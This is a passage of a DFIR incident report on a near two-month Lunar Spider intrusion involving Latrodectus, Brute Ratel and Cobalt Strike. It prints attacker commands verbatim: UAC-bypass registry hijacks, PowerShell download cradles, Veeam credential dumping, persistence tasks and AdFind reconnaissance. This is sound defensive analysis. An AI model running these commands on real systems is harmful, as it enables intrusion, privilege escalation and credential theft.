{ "id": "216cfbfd-7e5c-4660-af68-d9e413165ba7", "created_at": "2026-04-06T01:32:28.551499Z", "updated_at": "2026-04-10T13:12:03.008749Z", "deleted_at": null, "sha1_hash": "f0163a40d10de6ebe7169543e45e67af2d6a621f", "title": "From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 8143122, "plain_text": "From a Single Click: How Lunar Spider Enabled a Near Two-Month\r\nIntrusion\r\nBy editor\r\nPublished: 2025-09-29 · Archived: 2026-04-06 00:44:55 UTC\r\nThis case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one\r\ntime access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025\r\nCase Summary\r\nThe intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been\r\npreviously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated\r\nfile, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among\r\nextensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which\r\ndeployed a Brute Ratel DLL file using rundll32.\r\nThe Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established\r\ncommand and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was\r\nthen observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance\r\nactivities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest,\r\nand whoami commands.\r\nApproximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the\r\nbeachhead host.\r\nOn day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext\r\ndomain administrator credentials left over from an automated deployment process. This provided the threat actor with\r\nimmediate high-privilege access to the domain environment.\r\nOn day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges\r\nusing Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account\r\nfound the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind.\r\nAround an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy\r\nCobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.\r\nThey then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a\r\nscheduled task for persistence and setup an additional command and control channel. They also dropped another\r\nCobalt Strike beacon that had a new command and control server. They then used a custom tool that used the\r\nZerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller.\r\nAfter that they then tried to execute Metasploit laterally to that domain contoller via a remote service. However they\r\nwere unable to establish a command and control channel from this action.\r\nOn day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt\r\nStrike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 1 of 48\n\nStrike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for\r\npersistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions.\r\nFifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to\r\nexecute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send\r\ndata over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in\r\nthreat actor actions.\r\nOn the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump\r\ncredentials from the backup server software. Two days later on the backup server they appeared again and dropped a\r\nnetwork scanning tool, rustscan, which they used to scan subnets across the environment. After this hands on activity\r\nceased again.\r\nThe threat actor maintained intermittent command and control access for nearly two months following initial\r\ncompromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel,\r\nand Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive\r\naccess to critical infrastructure, no ransomware deployment was observed during this intrusion.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by @RussianPanda9xx, Christos Fotopoulos, Salem Salem, reviewed by\r\n@svch0st.\r\nInitial Access\r\nThe infection began with the execution of a Latrodectus JavaScript file, Form_W-9_Ver-i40_53b043910-\r\n86g91352u7972-6495q3.js, first reported on X by @Cryptolaemus1 in the following post:\r\nThe malware was first uploaded to VirusTotal on May 9, 2024, prior to Operation Endgame. This operation occurred\r\nbetween May 27 and 29, 2024, during which law enforcement dismantled multiple botnets, including Latrodectus.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 2 of 48\n\nAfter the take down of the botnet, Latrodectus reappeared in June 2024, using tax-themed phishing campaigns as its\r\ninitial access mechanism that dropped Latrodectus version 1.3 along with Brute Ratel, according to this article by\r\nTrustwave.\r\nAlthough our sample was from May and its file name was related to a W-9 tax form, it was version 1.3 of the\r\nmalware and additionally it utilized Brute Ratel. Based on that, we believe it to be an early version of the campaign\r\nthat was used later in June. \r\nThis report from Rapid7, also from June 2024, shows a malicious ad as the initial access used to lure a victim to\r\ndownload the malicious Javascript file. Given the similarity of that report and our initial malware behavior we assess\r\nthat this we likely the same method used for our case as well.\r\nThe heavily obfuscated JS file contained multiple lines starting with //, which included filler text. After further\r\nanalyzing the file, a deobfuscation workflow was identified, executing all the lines of code starting with ////.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 3 of 48\n\nStage 1\r\nStage 2\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 4 of 48\n\nDeobfuscating the Latrodectus malware, uncovered that it performed an HTTP request to the URL\r\nhxxp://91.194.11[.]64/MSI.msi to install the next stage, thus triggering the Suricata rule from Emerging Threats ET\r\nPOLICY Observed MSI Download.\r\nExecution\r\nStatic analysis of the MSI package revealed that upfilles.dll was embedded within the compressed disk1.cab archive.\r\nThe MSI installer utilized a custom action to execute the DLL via the legitimate Windows binary rundll32.exe,\r\nspecifically invoking the exported function stow to initiate malicious execution.\r\nBrute Ratel\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 5 of 48\n\nOn day one, the loader upfilles.dll began execution on the beachhead host by resolving three APIs (VirtualAlloc,\r\nLoadLibraryA, GetProcessAddress) via the following hashing algorithm:\r\n for char in api_name:\r\n char_byte = ord(char)\r\n \r\n # Converts to lowercase, adds current hash\r\n temp = (char_byte | 0x60) + hash_value\r\n \r\n # Double for position-dependent hash\r\n hash_value = 2 * temp\r\n \r\n return hash_value\r\nHashing algorithm\r\nThen it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key:\r\n21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 6 of 48\n\nThe encrypted intermediary BRC4 payload\r\nThe shellcode above then decrypted the BRC4 badger via the RC4 key 71 24 70 2C 7D 70 61 3F. Below are the\r\ndecrypted Brute Ratel C4 (BRC4) C2s and RC4 key to decrypt the gathered information on the infected system that\r\nis sent to the C2.\r\nDecrypted BRC4 C2s and the RC4 key\r\nThe subsequent YARA rule triggered during a scan of the process memory for Brute Ratel:\r\nOn day five, the threat actor deployed a new Brute Ratel DLL through the established BackConnect session:\r\nrundll32 wscadminui.dll, wsca\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 7 of 48\n\nThe wscadminui.dll file serves as the Brute Ratel badger payload, maintaining the same obfuscation patterns\r\nestablished by the upfilles.dll loader. Decryption of the intermediary BRC4 payload is achieved through XOR\r\noperations using the embedded key sequence 75 36 58 33 64 4F 61 3F 4B 59 23 42 77 42 6F 41 39 6D 6E 4E 5E 46\r\n56 47 66 41 00.\r\nLatrodectus\r\nAfter executing, Brute Ratel deployed Latrodectus malware through process injection into explorer.exe leveraging\r\nCreateRemoteThread API. Latrodectus, a downloader first identified by Proofpoint researchers in November 2023, is\r\nattributed to the same threat actors responsible for developing IcedID.\r\nLatrodectus being injected into explorer.exe\r\nApproximately six hours later, the process running Latrodectus established a connection to 193.168.143[.]196 on the\r\nbeachhead host, which we suspect to have been a BackConnect C2 server. BackConnect is a post-compromise\r\nmodule that was initially deployed by IcedID, allowing threat actors to leverage infected systems for remote access\r\nthrough VNC modules. Multiple security researchers, such as Elastic Security Labs, hypothesize that Latrodectus is a\r\npotential successor to IcedID, due to code reuse and behavioral similarities, including the use of the same commands\r\nin the Discover flag.\r\nAn hour after this traffic started, the following command was executed to switch to UTF-8 encoding:\r\ncmd.exe /K chcp 65001 \u0026\u0026 c: \u0026\u0026 cd c:\\\r\nThis command was previously observed in Keyhole, a multi-functional VNC/BackConnect component used by\r\nIcedID, and prior cases involving IcedID infection.\r\nA few minutes later, Latrodectus spawned DLLHost.exe to likely inject the BackConnect payload with\r\nPROCESS_ALL_ACCESS (0x1fffff) access rights. The granted access rights provide full control over the target\r\nprocess, enabling memory manipulation, thread creation, and DLL injection capabilities.\r\nlsassa.exe Backdoor\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 8 of 48\n\nOn day four, the threat actor deployed and executed a binary named lsassa.exe via BackConnect on the beachhead\r\nhost.\r\nThreat actor dropping lsassa.exe via BackConnect session\r\nThe lsassa.exe file was a .NET backdoor that contained an encrypted payload embedded in an assembly resource file\r\nnamed lsassa\u0026\u0026. Inside this resource, a small header was present declaring which protections were used (encryption\r\nand/or compression). If encryption is used, it either uses a key embedded in the file or derives one from the\r\nassembly’s public key token, then decrypts the payload. If compression is enabled, the code decompresses the\r\ndecrypted data before loading it.\r\nThe backdoor implemented a persistent command and control system that establishes covert communication between\r\nan infected machine and a remote threat actor controlled server while creating a scheduled task for persistence. Upon\r\ninitialization, the backdoor establishes a timer-based polling mechanism that triggers every 250 seconds to maintain\r\nregular contact with the C2 infrastructure and uses extracted obfuscated strings to construct the command. In our\r\ncase, the threat actor leveraged the backdoor to create a scheduled task on the beachhead host with the command:\r\n\"cmd.exe\" /c schtasks /create /tn \"SchedulerLsass\" /tr \"%ALLUSERSPROFILE%\\USOShared\\lsassa.exe\" /sc ons\r\nDuring each communication cycle, the backdoor collects basic system reconnaissance data, including the username\r\nand machine name of the infected host, then transmits it to a remote server endpoint. The server C2\r\n(hxxps://cloudmeri.com/comm[.]php) was obfuscated and embedded within the resource file name lsassa$ from the\r\ndecrypted resource file lsassa\u0026\u0026. After successfully transmitting the victim data, the backdoor waits for a server\r\nresponse containing executable commands.\r\nWhen commands are received from the remote server, the backdoor validates that the response content is not empty\r\nand executes the payload through the Windows command interpreter. The execution occurs by spawning a new\r\ncmd.exe process with the UseShellExecute flag disabled and CreateNoWindow enabled to maintain stealth, while\r\nredirecting standard output and error streams to capture results. The backdoor includes a special termination\r\ncommand that allows the remote operator to exit the backdoor by calling Environment.Exit when a specific response\r\nstring is received.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 9 of 48\n\nSnippet of code showing the backdoor’s command and control communication function that collects system\r\ninformation and transmits it to a remote server while awaiting executable commands\r\nThe backdoor conceals its strings in an encrypted resource and only reveals them at runtime. The extraction function\r\nfirst reads a length value to determine how many bytes to pull, then converts those bytes into readable text using\r\nUnicode encoding.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 10 of 48\n\nString extraction function that uses variable-length encoding to decode obfuscated strings from the decrypted\r\nresource data array\r\nCobalt Strike\r\nSeveral Cobalt Strike beacons were utilized over the course of the intrusion. The first was observed on day four,\r\nwhere the cron801.dl_ file was dropped on the beachhead host under C:\\ProgramData from the injected explorer.exe\r\nprocess containing Latrodectus and was then executed twice by leveraging BackConnect.\r\nrundll32 cron801.dl_,lvQkzdrFdILT\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 11 of 48\n\nBackConnect launching Cobalt Strike payload (pcap)\r\nThe outbound connection was established with the Cobalt Strike server at hxxp://45.129.199[.]214/vodeo/wg01ck01.\r\nShortly after, the Cobalt Strike beacon spawned from rundll32.exe was injected into sihost.exe process.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 12 of 48\n\nAnalysis of network traffic revealed a JSON response containing minified Vuetify v3.0.3 JavaScript served by the\r\nCobalt Strike C2 server. This discovery led to the identification of additional potentially related C2 servers using\r\nVirustotal searches for similar characteristics (JSON response content or the URL path /vodeo/):\r\nhxxp[://]94[.]232[.]40[.]49/vodeo/wg01ck01\r\nhxxps[://]techbulldigital[.]com/Apply/readme/VJICARU60DC?_WHBEXNIA=HNMIIIANEMPMLIDFEOPKLBDOEMPI\r\nhxxp[://]techbulldigital[.]com/List/com2/9O29EO3IRSBB\r\nhxxp[://]filomeruginfor[.]com/christian/house/cwk01\r\nhxxp[://]filomeruginfor[.]com/deolefor/wg01ck01m\r\nhxxps[://]wehelpgood[.]xyz/Complete/v9[.]56/KT84GVGD135E\r\nhxxps[://]wehelpgood[.]xyz/derive/n/nzoqjd9mme\r\nhxxp[://]94[.]232[.]249[.]186/vodeo/vid_wg01ck01\r\nhxxp[://]94[.]232[.]249[.]186/vodeo/wg01ck01\r\nJSON response from Cobalt Strike C2\r\nLater the cron801.dl_ file was renamed system.dl_ and deployed to several hosts, this is covered further in the Lateral\r\nMovement section\r\nLater on the same day, after the execution of the lsassa.exe backdoor, the threat actor dropped sys.dll. This was\r\nanother Cobalt Strike stager containing shellcode that exhibits similarities to the payload documented in this report,\r\nvia the BackConnect session on the beachhead host.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 13 of 48\n\nThe threat actor executed it via BackConnect with the command:\r\nrundll32 %ALLUSERSPROFILE%\\sys.dll,StartUp471\r\nThe Cobalt Strike implant initiated outbound communication to 206.206.123[.]209:443 (avtechupdate[.]com) before\r\ninjecting itself into the sihost.exe process. After the attempted UAC bypass, the Cobalt Strike stager was executed in\r\nmemory with the C2 pointing to resources.avtechupdate[.]com/samlss/vm.ico.\r\nSnippet of Cobalt Strike stager\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 14 of 48\n\nSpeakeasy output from the extracted Cobalt Strike stager shellcode\r\nShortly after, the sihost.exe process (containing an injected Cobalt Strike beacon) used RUNAS execution to create a\r\nnew process (“gpupdate.exe”) running as the “Domain Admin” account, as described in the Privilege Escalation\r\nsection.\r\nSubsequently, the compromised sihost.exe process, containing an injected Cobalt Strike beacon, leveraged the\r\nRUNAS command to spawn a new gpupdate.exe process under the domain admin account.\r\nsihost.exe spawning gpupdate.exe as “Domain Admin” user account\r\nThe gpupdate.exe process then injected a Cobalt Strike beacon into the spoolsv.exe process space.\r\nBoth spoolsv.exe and gpupdate.exe processes were observed creating named pipes consistent with Cobalt Strike\r\ncommunication patterns.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 15 of 48\n\nCobalt Strike named pipes\r\nThe following day the sys.dll Cobalt Strike beacon was executed on two additional servers after connections to those\r\nhosts were made via RDP.\r\nPersistence\r\nRegistry Run Key\r\nPersistence was first established after initial access on day one via a Registry Run key. This was achieved via the\r\nrundll32.exe process that created a Run key, with an innocuous name of Update, which would execute the Brute\r\nRatel badger, upfilles.dll, if the system was restarted.\r\nThe Run key was updated multiple times during the intrusion to point to wscadminui.dll in place of upfilles.dll. We\r\ncould not determine why the actor re-applied the same change on several occasions.\r\nScheduled Tasks\r\nIn addition to the Run key the threat actor created a scheduled task on the fourth day of the intrusion on the\r\nbeachhead host. The scheduled task was created by lsassa.exe which has been explained in further detail in the\r\nExecution section.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 16 of 48\n\nPrivilege Escalation\r\nRunas\r\nThe threat actor activated Windows’ Secondary Logon service to enable the runas command – a built-in Windows\r\nfeature that allows running programs under different user credentials. By calling this service, they were able to\r\nauthenticate as the domain admin account found in the unattend.xml file and escalate their privileges from a regular\r\nuser to full administrative control over the network\r\nStarting the Secondary Logon service\r\nThe Windows authentication log shows successful privilege escalation from a low-privileged user to a domain\r\nadministrator account with elevated token permissions.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 17 of 48\n\nWindows security log showing privilege escalation from a low-privileged user to a domain admin\r\nUAC Bypass\r\nThe Cobalt Strike sys.dll implant executed on the beachhead host initiated a UAC bypass using the elevate uac-token-duplication technique, a well-documented registry hijacking method first observed in 2017. This technique\r\nexploits the UAC token duplication vulnerability, allowing the Cobalt Strike implant to execute arbitrary code with\r\nprivileges stolen from elevated processes, successfully achieving privilege escalation without user interaction.\r\nInitial registry modifications hijacked the ms-settings protocol handler to redirect Windows Settings calls to\r\nmalicious PowerShell commands:\r\nreg add \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" /f /d \"cmd.exe /c powershell -nop -w hid\r\nreg add \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" /v DelegateExecute /f /d \"cmd.exe /c pow\r\nPrivilege escalation occurred through execution of ComputerDefaults.exe, a trusted Windows binary that queries the\r\nhijacked ms-settings protocol with elevated privileges.\r\nWith the elevated token duplicated from ComputerDefaults.exe, multiple PowerShell instances were executed to\r\nestablish communication with the Cobalt Strike listener, indicating token rights restrictions requiring different\r\nexecution approaches:\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 18 of 48\n\n\"cmd.exe\" /c powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.\r\npowershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/'\r\n\"C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\r\nDefense Evasion\r\nProcess Injection\r\nThe most common evasion technique that the threat actor utilized was process injection. During its execution, the\r\nBrute Ratel loader upfilles.dll launched the final stage of the Latrodectus malware inside the explorer’s memory.\r\nFrom the fourth day onward, the threat actor expanded their tooling and heavily utilized both Brute Ratel and Cobalt\r\nStrike for process injection. Using the Sysmon eventID 8, CreateRemoteThread, multiple instances of process\r\ninjection were identified for both long-term and short-term sacrificial processes.\r\nAfter further investigating the process memory, YARA rules confirmed also the injection of Cobalt Strike beacons\r\ninto multiple legitimate processes, such as spoolsv.exe.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 19 of 48\n\nFile Deletion\r\nΤhe threat actor also deleted files after using them, to cover their tracks and make the investigation more challenging.\r\nSpecifically, they deleted more than half of the files and tools that had been downloaded on the compromised hosts.\r\nCredential Access\r\nLatrodectus Stealer Module\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 20 of 48\n\nUsing command ID 21, the Latrodectus-injected explorer.exe process downloaded the stealer module file\r\nfxrm_vn_9.557302425.bin from the C2 server.\r\nAnalysis revealed that the stealer lacks functionality to decrypt cookies from current Chrome versions, suggesting the\r\nthreat actor may not have updated their stealer module to accommodate recent browser security enhancements. The\r\nstealer had the hardcoded time of when the stealer module was built – 00:39:18 Mar 29 2024.\r\nSimilar to the Latrodectus loader component, the stealer module dynamically resolved Windows APIs by iterating\r\nthrough the Process Environment Block (PEB) InLoadOrderModuleList, computing CRC32 hashes for each loaded\r\nmodule name, and comparing results against target hash values.\r\nThe stealer was capable of harvesting credentials from 29+ Chromium-based browsers, including Google Chrome,\r\nMicrosoft Edge, Yandex Browser, Vivaldi, Comodo Dragon, Orbitum, Epic Privacy Browser, and other variants.\r\nFirefox receives separate handling through profile enumeration targeting cookies.sqlite database files.\r\nDuring its execution, it extracted email credentials from Microsoft Outlook configurations across Office versions\r\n11.0-17.0 by querying Windows registry keys. The stealer is also capable of harvesting server configurations\r\nincluding SMTP, POP3, IMAP, and NNTP server addresses, port numbers, usernames, and encrypted passwords.\r\nAdditionally, it targeted the registry path HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\r\nMessaging Subsystem\\Profiles to extract legacy email configurations from older Windows Mail, Outlook Express,\r\nand MAPI profiles that may contain additional cached credentials. Internet Explorer credentials were obtained\r\nthrough COM interface manipulation, accessing the IntelliForms Storage2 system.\r\nThe collected data is organized into distinct sections with the below headers:\r\ncr_pass for Chrome passwords\r\nff_pass for Firefox data\r\nie_pass for Internet Explorer credentials\r\nedge_pass for Edge data\r\noutlook_pass for email configurations\r\n_cookie variants for session data.\r\nEach section contains structured entries with pipe-delimited fields. The complete dataset undergoes base64-encoding.\r\nThe stealer then creates a shared memory region named 12345 and stores a pointer to the encoded data, which could\r\nallow other processes to access the collected information.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 21 of 48\n\nSnippet of data collection code showing Firefox, IE, Edge, and Outlook extraction functions.\r\nAnswer File Access\r\nBackconnect was used by the threat actor early in the campaign (day three) to list directories on the beachhead. After\r\nlisting files in directories, the threat actor focused their attention on the file unattend.xml, an answer file. Answer files\r\nare used to control the configuration of Windows while setting it up from an image.\r\nOne of the components of answer files is called Microsoft-Windows-UnattendedJoin which allows admins to easily\r\ndomain join devices during setup, this is done by supplying plain text credentials (username and password) in the\r\nunattend.xml file. The threat actor collected the file via Backconnect (using the GET C:\\Unattend.xml command) and\r\nwas able to access the plain-text domain admin credentials stored in the file.\r\nLSASS Access\r\nThe threat actor utilized their elevated user permissions to access the LSASS process on multiple devices in the\r\nenvironment.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 22 of 48\n\nAll instances of LSASS access followed the same pattern, the access was initiated by an injected process (either\r\nrunonce.exe or gpupdate.exe) with a process requesting 0x1010 permissions and another instance of the same process\r\nrequesting 0x1fffff seconds later. This cycle repeated three times in total during the intrusion, each time facilitated via\r\na Cobalt Strike beacon process.\r\nVeeam-Get-Creds\r\nOn day 26 of the intrusion, the threat actor ran the Veeam-Get-Creds.ps1 script from the injected spoolsv.exe process:\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQ\r\nwhich decoded to:\r\nIEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:24003/'); Veeam-Get-Creds.ps1\r\nThis technique has been previously observed by ransomware groups such as Noberus and Vice Society. It typically\r\nindicates the threat actor is targeting backup systems for destruction or virtualization infrastructure for encryption\r\n(commonly protected by Veeam backup solutions). The Veeam-Get-Creds.ps1 script is publicly available on GitHub.\r\nUpon executing the script, the threat actor would have obtained any plaintext usernames and passwords stored in the\r\nVeeam Credential Manager. These credentials are typically used to authenticate to remote systems for backup\r\noperations. Although in this intrusion, this execution was one of the final actions taken by the threat actor.\r\nDiscovery\r\nApproximately one hour after Latrodectus was injected into explorer.exe, it began executing the following discovery\r\ncommands on the beachhead host.\r\nipconfig /all\r\nsysteminfo\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nnet config workstation\r\nwmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | find\r\nwhoami /groups\r\nProcess activity related to discovery then went quiet until on day four, the injected Cobalt Strike beacon used\r\nsysteminfo to query for system information. The threat actor then executed DISK command via BackConnect to\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 23 of 48\n\nquery disk information.\r\nDISK command execution via BackConnect session\r\nThe Cobalt Strike injected processes then executed reconnaissance commands and leveraged AdFind for Active\r\nDirectory enumeration activities:\r\nsysteminfo\r\nnltest /dclist:domain.local\r\nnet view REDACTED\r\nnet user REDACTED /domain\r\ndir \\\\REDACTED\\C$\r\nnet group \"domain admins\" /domain\r\ndsquery subnet\r\nnltest /domain_trusts\r\nnltest /dsgetdc:domain.local\r\nwmic /node:REDACTED logicaldisk list brief\r\nAdFind Active Directory Enumeration:\r\nadfind.exe -f \"(objectcategory=person)\" \u003e\u003e ad_users.txt\r\nadfind.exe -f \"objectcategory=computer\" \u003e\u003e ad_computers.txt%W\r\nadfind.exe -f \"(objectcategory=organizationalUnit)\" \u003e ad_ous.txt\r\nadfind.exe -subnets -f (objectCategory=subnet)\u003e ad_subnets.txt\r\nadfind.exe -gcb -sc trustdmp \u003e ad_trustdmp.txt\r\nadfind.exe -f \"\u0026(objectCategory=computer)(operatingSystem=*server*)\" -csv \u003e ad_servers.csv\r\nContinued Discovery and Network Testing:\r\nnet view REDACTED\r\nping -n 1 REDACTED\r\ntype \"\\\\REDACTED\\C$\\REDACTED\\REDACTED.bat\"\r\nThe threat actor then tried to move AdFind outputs, but appeared to struggle based on the commands observed:\r\nC:\\PerfLogs\\*.* %ALLUSERSPROFILE%\\\r\nmove %ALLUSERSPROFILE%\\ad_users.txt C:\\REDACTED\\\r\nmove C:\\REDACTED\\ad_users.txt %PUBLIC%\\\r\nWhile this was happening, they continued to issue more discovery commands and attempted to organize their AdFind\r\noutput:\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 24 of 48\n\nnet view REDACTED\r\nwmic /node:REDACTED logicaldisk list brief %WINDIR%\\system32\\cmd.exe /C ping -n 1 REDACTED\r\nmove %USERPROFILE%\\ad_users.txt %USERPROFILE%\\Pictures\\\r\nattrib %USERPROFILE%\\Pictures\\ad_users.txt\r\nThe actor then expanded their reconnaissance to include DNS information while simultaneously troubleshooting file\r\naccess issues on their collected data:\r\ndnscmd /zoneprint domain.local\r\nnetdom query SERVER \u003e\u003e serv.log\r\nattrib -a -s -h -r /s %USERPROFILE%\\Pictures\\ad_users.txt\r\nattrib %USERPROFILE%\\Pictures\\ad_users.txt\r\nattrib %USERPROFILE%\\Pictures\\*.*\r\nattrib -a +s +h -r /s %USERPROFILE%\\Pictures\\ad_users.txt\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 25 of 48\n\nBased on the BackConnect traffic capture, we observed that the threat actors did not have the proper access to the\r\nfiles.\r\nMinutes later, the compromised explorer.exe process spawned DllHost.exe, indicating resumption of the\r\nBackConnect VNC activity observed previously. The DllHost.exe process subsequently executed a Windows shell\r\ncommand to open the “This PC” interface on the beachhead host:\r\ncmd.exe /c start \"\" C:\\Windows\\explorer.exe shell:mycomputerfolder\r\nThe session was then leveraged to attempt to view the AdFind results:\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" \"C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt\"\r\nThe threat actor continued to encounter file permission issues, preventing them from accessing their own data. They\r\nattempted to resolve this by first setting the local user as the file owner, then switching to the domain account as\r\nowner, and when both ownership changes failed to provide adequate access, they finally used the /reset command to\r\nrestore default permissions:\r\nicacls C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt /setowner \"\u003clocal user\u003e\" /T /C\r\nicacls C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt /setowner \"\u003cdomain\u003e\\\u003clocal user\u003e\" /T /C\r\nicacls \"C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt\" /reset /T\r\nAfter running the Cobalt Strike beacons laterally on several hosts, the threat actor conducted remote user\r\nenumeration across domain systems using the following command from the beachhead host:\r\nquser \u003cREDACTED HOSTNAME\u003e\r\nThe threat actor utilized the PowerView module Invoke-ShareFinder twice during the intrusion.\r\nIEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:49157/'); Invoke-ShareFinder -CheckSh\r\nApproximately 45 minutes following the Metasploit shell deployment attempt on the second domain controller, the\r\nthreat actor initiated an additional round of AdFind reconnaissance from the beachhead host:\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=person) \u003e adflogs\\domain.local_ad_users.txt\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=computer) \u003e adflogs\\domain.local_ad_computers.txt\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=organizationalUnit) \u003e\r\nadflogs\\domain.local_ad_ous.txt\r\nAdFind.exe dc=domain,dc=local -subnets -f (objectcategory=subnet) \u003e adflogs\\domain.local_ad_subnets.txt\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=group) \u003e adflogs\\domain.local_ad_group.txt\r\nAlthough the threat actor attempted to compress the collected data, forensic analysis did not identify any created zip\r\narchives on the system.\r\n\"7z.exe\" a -mx1 -r0 adflogs.zip adflogs\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 26 of 48\n\nThe threat actor returned 28 days after the initial access to run a final round of network scanning discovery. Operating\r\nfrom a backup server, the threat 